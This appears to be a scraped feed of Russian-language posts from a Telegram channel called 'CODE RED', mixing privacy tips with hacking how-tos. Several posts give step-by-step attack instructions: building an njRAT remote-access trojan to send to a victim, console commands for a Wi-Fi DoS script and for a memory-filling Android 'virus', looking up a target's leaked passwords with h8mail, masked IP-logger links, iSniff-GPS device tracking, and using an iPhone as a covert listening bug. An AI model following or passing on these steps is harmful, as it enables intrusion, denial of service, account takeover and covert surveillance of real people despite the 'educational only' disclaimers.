CODE RED
9.26K subscribers
9 photos
2 videos
1.1K links
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.

Обратная связь: @encryptedadm
Download Telegram
Просматриваем удаленные записи пользователей

Все, что все попадает в интернет, остаётся в нем навсегда. Очень популярная фраза, которую многие недооценивают. А между тем все ваши фотографии и действия в социальных сетях действительно «оседают» на серверах. Даже, если вы решите удалить какой-то пост со своей страницы, то его копия все рано останется у обладателей ресурса.

Но с недавнего времени, появилась возможность просматривать удаленные посты и истории в том числе и у обычного пользователя. А помогает в этом UNDELETE — социальная сеть с искусственным интеллектом, которая каждый день сохраняет на свои сервера сотни тысяч удаленных постов и историй. В дальнейшем их, без ограничения времени, могут просматривать все пользователи.

Вам достаточно добавить интересующий аккаунт в подписки, а UNDELETE все сделает автоматически. А именно, начнет сохранять посты, которые удалил пользователь, а также его истории.

📌https://russia.undelete.news/ru/

#хитрости
Блокируем камеру смартфона

У
каждого из нас установлены пару десятков приложений, которые имеют разрешение на доступ к камерам. Это означает, что нечестные приложения (которых, кстати, хватает) могут в любое время использовать её для собственной выгоды или шпионажа, отправляя полученную информацию на сервера. Разумеется, не уведомляя об этом обладателя смартфона.

Выход из данной ситуации достаточно прост — приложение Camera Block, которое вы можете использовать, не устанавливая Root права на свое устройство. Данное приложение блокирует и отключает все ресурсы камеры, а также запрещает доступ к камерам другим приложениям из всей системы Android, что способствует конфиденциальности пользования.

Поскольку приложению предоставляется право администрировать устройство, удалить его прямо из диспетчера приложений не удастся. Для этого требуется открыть Camera Block, перейти в настройки и выбрать пункт «деинсталлировать приложение».

Я оставил ссылку на 4PDA, так как там можно скачать обычную и Pro версию. А также, перейти на официальный сайт или в Google Play для скачивания программы.

📌https://4pda.ru/forum/index.php?showtopic=686491

#приватность #android
Как превратить ваш iPhone в шпионское устройство

Узнать, что происходит в помещении без вас иногда не просто любопытно, но и необходимо. Конечно, можно воспользоваться сложной шпионской техникой или же просто оставить включенный диктофон. Но как быть, если жучков у вас нет, а информация нужна оперативно, иначе говоря, диктофон - не выход.

Для этой задачи нам потребуется IPhone и наушники AirPods. Именно через них мы и будем прослушивать.

Настройка

1. Заходим в «Настройки», выбираем «Пункт управления»;
2. Добавляем «Слух»;
3. Теперь на панели управления нажимаем на появившуюся иконку с ухом;
4. Включаем Live - прослушивание.

Готово! Вставляем наушники и отходим в пределах радиуса действия (около 10 метров).

#хитрости #прослушка #IPhone
Cоздаем туннель для безопасной передачи файлов

Когда мы загружаем файл во всемирную паутину, мы автоматически даем доступ к нему различным сервисам, компаниям, людям. Наглядный тому пример - сайт из нашего недавнего обзора. И это - публичный ресурс.

Если вы пользуетесь почтовыми сервисами для отправки важных файлов, то вы на самом деле довольно сильно рискуете, ведь если произойдет очередной слив, ваши файлы откажутся в открытом доступе.

Чтобы максимально обезопасить передачу данных, можно воспользоваться WebWormHole.

WebWormHole - это сервис, которой создает туннель для отправки файлов. Файлы передаются с компьютера на компьютер без сторонней обработки данных.

Настройка

Чтобы наладить туннель, необходимо нажать кнопку New Wormhole — и получить код для входа.

Человек с другой стороны введет такой же код или URL — и между вами установится эфемерный туннель, по которому напрямую передадутся файлы.

📌https://webwormhole.io/

#хитрости #приватность
Почему не стоит сохранять пароли в браузере

Вы наверняка слышали о таком классе троянов (malware вирусов), как стилеры. Их функционал заключается в краже сохраненных в системе паролей и отправке их злоумышленнику.

Как работает стилер

Данный вирус пробирается в хранилища часто используемых программ (в основном браузеров) и ворует оттуда все: сохраненные вами файлы Cookie, логины и пароли. Затем, стиллер отправляет полученные данные злоумышленнику на почту.

Иногда у такого типа вируса есть дополнительная функция самоудаления. Наивный пользователь даже и не поймет, что его информацию похитили, пока пароль не перестанет подходить к его, например, почте, социальной сети или чего хуже, к электронным кошелькам.

Почему эта атака настолько опасно? Зачастую, антивирусные программы против стилера бессильны, ибо троян можно без труда закриптовать.

Как обезопасить себя

Ответ довольно прост. Дело в том, что данный вирус едва ли сможет как-то вам навредить, если вы не сохраняете пароли в браузере, а записываете их где-то в зашифрованных базах. Ну и еще один момент, стилеры, преимущественно, пишут для популярных браузеров.

#полезно #приватность
Как взломать смартфон с помощью тепловизора

Учёные из университетов Штутгарта и Мюнхена выяснили, что перехватывать пароли, PIN-коды и графические ключи можно с помощью тепловизора — специального устройства, которое определяет температуру поверхности.

Хакеры, воспользовавшиеся этим инструментом, могут незаметно для пользователя смартфона определить, к какой части экрана он прикасался, а это позволяет выяснить последовательность нажатий для разблокировки устройства. Получив физический доступ к смартфону, злоумышленники могут ввести известный им пароль и скомпрометировать личные данные пользователя.

Исследователи также установили, что наибольшему риску взлома подвержены пользователи Android, на чьих устройствах установлен графический ключ — от его ввода на экране остаётся наиболее различимые следы.

Получить фотографию смартфона, на котором виден тепловой след от набора пароля, очень просто — достаточно сфотографировать его экран с помощью тепловой камеры, причём это нужно сделать в течение минуты после того, как владелец ввёл код. В дальнейшем экран остывает, и тепловой след от ввода пароля становится необнаружим.

Тепловые камеры широко используются злоумышленниками. С их помощью можно узнавать коды для разблокировки кнопочных смартфонов, а также PIN-коды банковских карт (после того, как жертва воспользуется терминалом оплаты или банкоматом). Такие камеры свободно продаются, причём в продаже есть даже недорогие миниатюрные модели для использования со смартфоном.

Как себя обезопасить

Для защиты от перехвата паролей таким способом можно сделать несколько «ошибочных» прикосновений к экрану, что значительно усложнит процесс расшифровки пароля, приложить к экрану ладонь, благодаря чему он нагреется и «сотрёт» предыдущие нажатия, или выкрутить яркость экрана на максимум, что увеличит его температуру.

Ещё один вариант — использовать сразу несколько видов защиты, например, сканер отпечатков пальцев и пароль. Проще всего — не упускать смартфон из виду и следить за тем, чтобы его никто не сфотографировал.

#безопасность
Ищем признаки взлома системы

Рынок вредоносного программного обеспечения с каждым годом растет. Ни для кого не секрет, что большинство антивирусов не справляется с современными компьютерными вирусами. Вредонос может попасть в систему и остаться незамеченным даже при полном сканировании компьютера с помощью антивируса. Чтобы найти признаки вредоносного ПО, мы воспользуемся утилитой Loki.

Loki - это сканер для обнаружения признаков взлома. Благодаря корневым методам обнаружения, он довольно успешно анализирует систему и выявляет все признаки подозрительных файлов. Основными методами поиска является сравнение соответствия имен файлов, проверка правилами Yara, проверка хэшей, проверка обратной связи C2 и т.д.

Настройка

Устанавливаем Kali Linux

Вводим команды в консоль

▫️sudo pip2 install psutil netaddr pylzma colorama
▫️git clone https://github.com/Neo23x0/Loki
▫️cd Loki/
▫️python2 loki-upgrader.py
▫️python2 loki.py -h

Использование

Вывести список команд
▫️—help

Просканировать всю систему на наличие признаков взлома, результаты сканирования сохранить в файл (-l loki-report.txt)
▫️sudo python2 loki.py -l loki-report.txt
Подмена геолокации смартфона

Нередко бывают ситуации, в которых требуется скрыть свои настоящие GPS-данные. Например, от социальных сетей, приложений, навигатора или просто отправить боссу фейковое местоположение из дорожной пробки.

С такой задачей запросто может справиться приложение Mock Locations (fake GPS path). Это очень функциональный инструмент, который позволит замаскировать свою реальную геопозицию на ту, что вы сами выберете на карте, а также симулировать маршрут в реальном времени. Помимо этого, вы можете задать скорость передвижения, время пребывания в точках и выбрать высоту над уровнем моря.

Настройка

После установки, необходимо включить режим «Для разработчиков». Сделать это можно, многократно нажав на поле «Номер сборки», в меню с информацией о вашем устройстве. Затем, в меню для разработчиков, находим пункт «Выбрать приложения для фиктивных местоположений» и выбираем Mock Locations. Далее включаем геопозицию и можно пользоваться приложением.

К сожалению, в iOS подобного функционала нет. Высокая степень закрытости системы не позволяет установить программы из других источников, кроме официального магазина приложений App Store, в котором для подобных инструментов нет места. Выход тут - только джейлбрейк.

📌https://play.google.com/store/apps/details?id=ru.gavrikov.mocklocations&hl=ru

#приватность #android
Виртуальные номера для регистрации

В современном мире, чуть-ли не каждый интернет-сервис требует при регистрации подтверждения номера мобильного телефона. С одной стороны, это повышает безопасность аккаунта. Но с другой, бывает множество причин, когда запрос номера только мешает.

Существуют специальные сервисы, которые предоставляют виртуальный номер, на который вы можете получать СМС сообщения. Область применения достаточно обширная: с их помощью, вы сможете зарегистрировать не ограниченное количество новых аккаунтов или, например, получить еще одну скидку.

Большинство подобных сайтов, ориентируются на предоставление платных номеров. Их цены образуются от страны номера и интернет ресурса(Вконтакте, Яндекс такси, Telegram и т.д), с которого будут приходить СМС сообщения. Но, у каждого сайта есть и бесплатные номера, которыми могут воспользоваться все пользователи, даже не проходя регистрацию.

Cервисы

📌https://sms-activate.ru/ru/
📌https://onlinesim.ru/
📌https://simsms.org/
📌https://5sim.net/

#хитрости
Как управлять чужим компьютером с помощью вируса

Полагаю, многие из вас уже слышали о такой утилите, как njRAT, также известной как Bladabindi. Она является трояном удаленного доступа, который позволяет владельцу программы полностью контролировать компьютер конечного пользователя без его согласия. С помощью него мы и будем получать доступ к удаленному устройству.

Настройка

1. Первым делом, нужно скачать njRAT с хранилища Github и установить его.
2. Затем открываем порты, благо, информации об этом в сети предостаточно.
3. После запуска программы вводим порт, который только что открыли и нажимаем кнопку «Start».
4. Чтобы создать вирус, переходим в меню «Builder», что находиться в левом нижнем углу. В появившемся окне прописываем информацию: «Host» и «Port», у каждого они индивидуальные, вводим свои; Затем следует поле с именем будущего файла, вписываем любое; «ExeName», это название будущего процесса в Диспетчере задач; «Directory», путь в котором будет храниться копия файла, выбираем самый надежный «%AppData%».
5. Справа находятся дополнительные, защитные, настройки. Активируем все галочки, за исключением последнего пункта.
6. Нажимаем «Builder» и сохраняем файл.

Использование

Создался новый файл, который и будет активировать вирус удаленного доступа. Его можно отправить будущей жертве. В случае запуска, в программе njRAT появиться дополнительное окно, в котором будет отображен компьютер жертвы. Кликаем правой кнопкой мыши по этому полю и получаем полный контроль над удаленным устройством.

📌https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code

❗️Помни, вся информация предоставлена исключительно в ознакомительных целях.

#хакинг
Блокируем микрофон смартфона

Помимо просмотра камеры (которую мы недавно научились блокировать), хакер может иметь возможность прослушивать микрофон устройства. Разумеется, без уведомления пользователя. Помимо мошенников, к микрофону так же имеют доступ множество приложений на смартфоне. Они могут записывать аудио с микрофона в любой момент.

Для защиты устройства от несанкционированной записи голоса через микрофон разработали приложение — Microphone Block - Anti malware, от тех же создателей, что и Camera Block. Приложение программно блокирует и отключает ресурсы микрофона, а так же запрещает доступ другим приложениям из всей системы Android.

Данное приложение, для удобства, автоматически отключает блокировку микрофона во время звонка. Еще в Microphone Block встроена функция, которая поможет вам проанализировать и поймать приложение, которое может записывать и шпионить за вами.

Я оставил ссылку на 4PDA, так как там можно скачать обычную и Pro версию. А также, перейти на официальный сайт или в Google Play для скачивания программы.

📌https://4pda.ru/forum/index.php?showtopic=686489

#приватность #android
Вычисляем передвижение IOS устройства

С развитием технологий мобильный телефон все больше превращается из обычного устройства для переговоров в устройство, шпионящее за своим владельцем. Разработчики софта под смартфоны как будто специально стараются предоставить окружающим доступ к личной информации пользователя. С одной стороны, это нехорошо, с другой — порой грех не воспользоваться этим.

Чтобы вычислить передвижение человека с IOS устройством, достаточно задействовать утилиту ISniff-GPS. ISniff-GPS прослушивает ARP пакеты близлежащих Iphone/Ipad и других беспроводных устройств.

Цель такой прослушки — собрать данные, на основании которых можно будет идентифицировать каждое устройство, и определить географическое местоположение, основываясь исключительно на информации о последней использованной WiFi сети.

Настройка

Устанавливаем Kali Linux

Вводим команды в консоль

▫️apt-get install python-scapy
▫️git clone https://github.com/hubert3/iSniff-GPS.git
▫️cd iSniff-GPS/
▫️pip install -U -r requirements.txt

Использование

Вывести список команд
▫️—help

Запускаем веб-сервер для пользовательского графического интерфейса
▫️./manage.py runserver 127.0.0.1:8000 &

Запускаем прослушивание
▫️./run.sh -i wlan0

#хитрости #IOS #sniffing
Отслеживаем IP-адрес с помощью картинки

На сегодняшний день достаточно одного перехода пользователя по ссылке с картинкой, чтобы узнать его IP-адрес и примерное местоположение компьютера. А создать подобную ссылку занимает буквально несколько кликов мышью.

Чтобы сгенерировать ссылку с трекером, нам понадобиться сайт IPlogger, любая картинка, а также сервис сокращения ссылок и онлайн хранилище файлов.

Настройка

1
. Первым делом мы загружаем любую картинку на сервис для хранения фото. Например, на Google Photo или Google Drive.
2. После того, как мы загрузили фотографию в хранилище, копируем ссылку на этот файл с помощью правой кнопки мыши.
3. Открываем сайт IPlogger и вставляем ссылку в поле «URL & Image Shortener», нажимаем кнопку «Get IPLogger coge».
4. Копируем получившуюся ссылку из поля «Your IPLogger link for collecting statistics» и переходим на сервис Bitly, чтобы замаскировать ссылку.
5. Копируем и отправляем получившуюся ссылку будущей жертве.
6. Открываем вкладку «Logged IP’s» на сайте IPlogger и ждем, пока пользователь перейдет по ссылке.

Когда жертва перейдет по ссылке, у нее откроется ничем не примечательная фотография. А у вас появится окно с IP-адресом и примерной геопозицией компьютера.

📌https://iplogger.org/

#хитрости #слежка
Устраиваем DDoS атаку на Wi-Fi с телефона

DDoS — хакерская атака на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён.

Если вы имеет подключение к Wi-FI роутеру, то такую атаку можно совершить, используя Termux.

Настройка

Устанавливаем Termux

Прописываем команды в консоль:

▫️pkg upgrade
▫️pkg install python python2 git
▫️cd
▫️git clone https://github.com/artem-cell/wifi-dosser
▫️cd wifi-dosser
▫️pip2 install requests mechanize
▫️ls
▫️python2 wifi-ddoser.py

Использование

Для проведения атаки необходимо подключится к роутеру. Далее введите команду ниже.
▫️python2 wifi-ddoser.py example.com 80 3 999999999999

80 и 3 - это стандартные порты
999999999999 - это время атаки в секундах

Чтобы прекратить атаку, нужно перезагрузить роутер.

❗️Помни, вся информация предоставлена исключительно в ознакомительных целях.

#хакинг #DDoS
Имитация другого устройства в браузере

Чтобы загрузить Web-страницу, ваш браузер посылает информацию об устройстве, с которого отправляется запрос, дабы сервер мог отдать нужную версию сайта, наиболее подходящую для вашего устройства. К сожалению, данный механизм приводит к утечке данных как о вас, так и о цифровом отпечатке вашего устройства.

Но, чтобы это прекратить, достаточно использовать расширение User-Agent с открытым исходным кодом, выдав свой браузер за другое устройство, или вовсе подменить сам браузер на любой из возможных.

Помимо преимуществ в отношении конфиденциальности, вы также можете изменять поведение сайтов, подменив свой компьютер на конкретное устройство. Например, Instagram позволяет загружать в него фотографии только в том случае, если он считает, что вы зашли с мобильного устройства, то есть вы можете загружать туда фото с нашего компьютера, если настроить User-Agent как у какого-нибудь смартфона.

📌https://add0n.com/useragent-switcher.html

Скачать расширение

Google Chrome — ссылка
Mozilla Firefox — ссылка
Opera — ссылка

#хитрости #расширения
Временная почта на смартфоне

Работая в интернете, многие пользователи сталкиваются с необходимостью зарегистрироваться на каком-либо сайте или принять от одного из своих контактов важное сообщение. Но проблема в том, что сайты обычно требуют подтверждения реального почтового ящика, и это в итоге оборачивается для пользователя неприятными последствиями в виде спама и еще чего хуже.

Instant Email Address - временная почта для вашего смартфона. Количество адресов не ограничено. Возможность как получать, так и отправлять электронную корреспонденцию. Нужна одноразовая почта для регистрации аккаунта? В один клик. Нужно отправить письмо не используя свой основной почтовый ящик? В один клик. Скачать программу можно на канале у моего коллеги.

❗️Кстати, однозначно рекомендую читать его, если хотите носить в кармане не стукача, а правильно настроенный и защищенный инструмент. Причем инструмент с такими возможностями, о которых вы не подозреваете.

📌https://t.me/tvoijazz

#хитрости #android
Создаем собственный вирус для телефона

Чтобы лучше понимать структуру вредоносных программ, предлагаю самостоятельно пройти процесс создания вредоноса. Нужно знать врага в лицо, так сказать.

Мы создадим собственный вирус в Termux, который заполняет всю свободную память телефона. Данный вирус практически убивает телефон, потому ни в коем случае не применяйте его против кого-либо!

Настройка

Устанавливаем Termux

1. Заходим в информацию о приложении Termux > Разрешение приложений > включаем пункт "память"

2. Прописываем команды в консоль:

▫️apt update
▫️apt upgrade
▫️pkg install git
▫️git clone https://github.com/Terror696/Vitus2.0
▫️cd Vitus2.0
▫️cp VirtualXposed.apk /sdcard/

После установки вирус появится в файлах вашего телефона.

❗️Напомню, запускать и отправлять вирус кому-то однозначно не рекомендуется!
Шифрование и скрытие файлов в Windows

Шифрование файлов, о котором мы сегодня поговорим, работает только на операционной системе Windows, так как эта программа использует ресурсы файловой системы NTFS. Она прячет файл в папку, или в другой файл абсолютно любого расширения, а спрятанный файл не виден в ОС, его может достать только файл для дешифровки.

Для того, чтобы зашифровать файлы, нам понадобиться предустановленный Python. А затем, скачиваем CryptFiles с репозитория GitHub.

Настройка

Прописываем команду в консоль:
▫️pip install pyCrypto

Запуск

Чтобы запустить шифрование, используйте команду:
▫️python crypt.py name_folder_or_file name_file password

Чтобы расшифровать, используйте команду:
▫️python decrypt.py name_folder_or_file name_file password

Также в одну папку или файл можно зашифровать множество файлов. Эти файлы не будут видны во всей операционной системе.

📌https://github.com/AndreyKoval3000/CryptFiles

#хитрости #приватность #windows
Фишки Google. Как искать файл определенного типа

При поиске документов, презентаций или других файлов в Google приходиться «перелопачивать» не одну страницу, пытаясь вытащить нужный объект. К счастью, есть быстрое & простое решение.

Оператор "filetype:" позволяет указать расширение файла, например, PDF. В указанном на картинке примере нас интересуют поиск PDF файлов, содержащие точную фразу «CODE RED».

Оператор "filetype:" позволяет указывать различные типы файлов. Вы можете также попробовать "doc", "docx", "rtf" (Word), "xls", "xlsx" (Excel), "ppt", "pptx" (PowerPoint), и "txt" (текстовые файлы). Ещё можно использовать "filetype:" для указания определённых вариантов веб-страниц, включая "html", "htm", "php", "asp" и т.д.

Нои имейте в виду, что расширение файла обычно должно указываться в URL-адресе, поэтому эти запросы не являются исчерпывающими. Так что в некоторых случаях все же придется пролистать десяток, другой страниц.

#google
Узнаем пароли пользователя через почту

Нередко, чтобы заполучить пароль, не нужно производить взлом или дополнительные атаки на аккаунты. Дело в том, что многих пользователей сети хотя бы раз взламывали, а значит, все данные хранятся в слитых базах.

Нужно лишь найти эти базы. В этом нам поможет утилита h8mail, которая произведет поиск по Email адресу в слитых базах. Если почта где-то сливалась, то мы узнаем пароль и, возможно, IP адрес.

Настройка

Устанавливаем Termux

Прописываем команды в консоль:

▫️apt update && apt upgrade -y
▫️apt install python -y
▫️pip3 install h8mail requests

Использование

▫️h8mail -t target@example.com

❗️Разумеется, использовать чужие пароли для каких-либо целей не стоит. А вот читать @coderedcom и заботиться о своей безопасности, дабы не оказаться в одной из этих баз - весьма полезно

#хакинг
Боты для скачивания видео и аудио с YouTube

К сожалению, стандартная версия видеохостинга YouTube не позволяет скачивать видео или аудио, даже в плохом качестве. Вместо этого, разработчики предлагают ежемесячно оплачивать данную функцию. Но зачем переплачивать, если есть доступ к бесплатным Telegram-ботам?

Боты, указанные ниже, позволяют скачивать видео и даже отдельные плейлисты. У каждого есть возможность выбрать качество, которое вы хотите скачать, или же есть вариант скачать аудио из определенного видео. Это может быть полезным, если вы прослушиваете лекции, скачиваете музыку или аудиокниги.

📌@SaveYoutubeBot
📌@AudioTubeBot

#боты